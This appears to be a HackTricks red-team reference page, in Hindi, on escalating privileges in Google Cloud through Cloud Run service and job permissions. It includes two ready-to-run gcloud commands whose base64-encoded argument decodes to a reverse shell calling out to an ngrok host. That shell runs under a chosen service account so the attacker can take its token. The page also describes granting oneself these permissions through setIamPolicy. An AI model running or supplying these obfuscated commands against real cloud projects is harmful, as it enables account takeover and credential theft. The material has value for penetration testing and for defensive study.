GCP - Run Privesc

शून्य से नायक तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो सब्सक्रिप्शन प्लान्स देखें!
आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
The PEASS Family की खोज करें, हमारे विशेष NFTs का संग्रह
💬 Discord समूह में शामिल हों या telegram समूह या Twitter पर 🐦 @carlospolopm का अनुसरण करें.
HackTricks के github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें और HackTricks Cloud.

Cloud Run

Cloud Run के बारे में अधिक जानकारी के लिए देखें:

`run.services.create` , `iam.serviceAccounts.actAs`, `run.routes.invoke`

एक हमलावर जिसके पास ये अनुमतियां होती हैं मनमाने कोड के साथ एक रन सर्विस बनाने के लिए (मनमाने Docker कंटेनर), उसे एक सर्विस अकाउंट से जोड़ने, और कोड को मेटाडेटा से सर्विस अकाउंट टोकन को निकालने के लिए बना सकता है।

इस विधि के लिए एक्सप्लॉइट स्क्रिप्ट यहाँ पाई जा सकती है और Docker इमेज यहाँ पाई जा सकती है।

ध्यान दें कि gcloud run deploy का उपयोग करते समय सिर्फ सर्विस बनाने के बजाय इसे update अनुमति की आवश्यकता होती है। यहाँ एक उदाहरण देखें.

`run.services.update` , `iam.serviceAccounts.actAs`

पिछले जैसा लेकिन एक सर्विस को अपडेट करना:

gcloud run deploy hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
--region=us-central1 \
--allow-unauthenticated

`run.services.setIamPolicy`

अपने आप को पिछले अनुमतियाँ दें Cloud Run पर।

`run.jobs.create`, `run.jobs.run`, (`run.jobs.get`)

एक जॉब लॉन्च करें जिसमें एक रिवर्स शेल हो ताकि आदेश में दिखाए गए सर्विस अकाउंट की चोरी की जा सके। आप यहाँ एक exploit यहाँ पा सकते हैं.

`run.jobs.update`,`run.jobs.run`,`iam.serviceaccounts.actAs`,(`run.jobs.get`)

पिछले जैसा ही यह संभव है कि एक जॉब को अपडेट करें और SA को अपडेट करें, आदेश और इसे निष्पादित करें:

gcloud beta run jobs update hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account=<proj-num>-compute@developer.gserviceaccount.com \
--region=us-central1 \
--project=security-devbox --execute-now

`run.jobs.setIamPolicy`

Cloud Jobs पर पिछली अनुमतियाँ अपने आप को दें।

संदर्भ

https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/

htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें

HackTricks का समर्थन करने के अन्य तरीके:

यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें तो सदस्यता योजनाएँ देखें!
आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
The PEASS Family की खोज करें, हमारा विशेष NFTs संग्रह
💬 Discord समूह में शामिल हों या telegram समूह या Twitter 🐦 पर मुझे फॉलो करें @carlospolopm.
HackTricks के github repos और HackTricks Cloud में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।

PreviousGCP - Resourcemanager Privesc NextGCP - Secretmanager Privesc

Last updated 3 months ago

Cloud Run

run.services.create , iam.serviceAccounts.actAs, run.routes.invoke

run.services.update , iam.serviceAccounts.actAs

run.services.setIamPolicy

run.jobs.create, run.jobs.run, (run.jobs.get)

run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)

run.jobs.setIamPolicy